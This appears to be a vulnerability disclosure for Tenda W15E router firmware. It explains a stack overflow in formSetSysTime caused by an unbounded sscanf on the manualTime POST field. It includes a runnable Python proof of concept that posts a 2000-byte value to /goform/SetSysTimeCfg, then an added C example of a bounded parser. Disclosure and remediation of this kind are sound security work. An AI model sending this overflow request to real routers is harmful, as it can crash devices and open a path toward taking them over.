- Firmware download website: https://www.tendacn.com/download/detail-2722.html
W15EV1.0 V15.11.0.14
The Tenda W15EV1.0 V15.11.0.14 firmware has a stack overflow vulnerability in the `formSetSysTime` function. The `mode` variable receives the `sysTimePolicy` parameter from a POST request; setting it to `manual` makes execution reach the `else if` branch.

In that branch, the `manual_time` variable receives the `manualTime` parameter from the same POST request. Because the user fully controls `manualTime`, the statement `sscanf((const char *)manual_time, "%[^-]-%[^-]-%[^ ] %[^:]:%[^:]:%s", year, month, day, hour, min, sec);` can cause a buffer overflow: none of the conversions carries a field width, so the user-provided time can exceed the capacity of the `year`, `month`, `day`, `hour`, `min` and `sec` arrays, triggering this security vulnerability.
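```python
import requests

ip = "192.168.84.101"
url = "http://" + ip + "/goform/SetSysTimeCfg"

# Oversized manualTime value: far longer than any valid timestamp.
payload = b"a" * 2000

data = {
    'sysTimePolicy': 'manual',   # selects the manual-time branch
    'manualTime': payload,       # parsed by the unbounded sscanf
}
response = requests.post(url, data=data)
print(response.text)
```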
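A bounded version of the parsing step described above, as an added example (not the firmware's code and not the author's). The struct, its field sizes, the 19-character limit and the name `parse_manual_time` are assumptions, since the page does not show the real buffer sizes.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical field holder; the sizes are assumptions, the page does not
 * give the real buffer sizes used in formSetSysTime. */
struct manual_time {
    char year[5], month[3], day[3], hour[3], min[3], sec[3];
};

/* Longest accepted input: "YYYY-MM-DD HH:MM:SS" (19 characters). */
#define MANUAL_TIME_MAX 19

/* Returns 0 when s is a bounded, digits-only "Y-M-D h:m:s" string, else -1. */
int parse_manual_time(const char *s, struct manual_time *t)
{
    int used = 0;

    /* Reject oversized input before any parsing happens. */
    if (s == NULL || t == NULL || strlen(s) > MANUAL_TIME_MAX)
        return -1;
    memset(t, 0, sizeof(*t));

    /* Each width is one less than its buffer size (the width excludes the
     * terminating NUL), so sscanf cannot write past the end of a field. */
    int n = sscanf(s, "%4[0-9]-%2[0-9]-%2[0-9] %2[0-9]:%2[0-9]:%2[0-9]%n",
                   t->year, t->month, t->day, t->hour, t->min, t->sec, &used);

    /* Require all six fields and no trailing bytes after the seconds. */
    if (n != 6 || s[used] != '\0')
        return -1;
    return 0;
}

int main(void)
{
    struct manual_time t;
    char big[2001];                      /* constructed oversized input */
    memset(big, 'a', sizeof(big) - 1);
    big[sizeof(big) - 1] = '\0';

    printf("valid:     %d\n", parse_manual_time("2024-01-02 03:04:05", &t));
    printf("oversized: %d\n", parse_manual_time(big, &t));
    printf("long year: %d\n", parse_manual_time("20240-1-2 3:4:5", &t));
    return 0;
}
```

The length check and the field widths are independent defenses: either one alone stops the 2000-byte value from reaching the stack buffers.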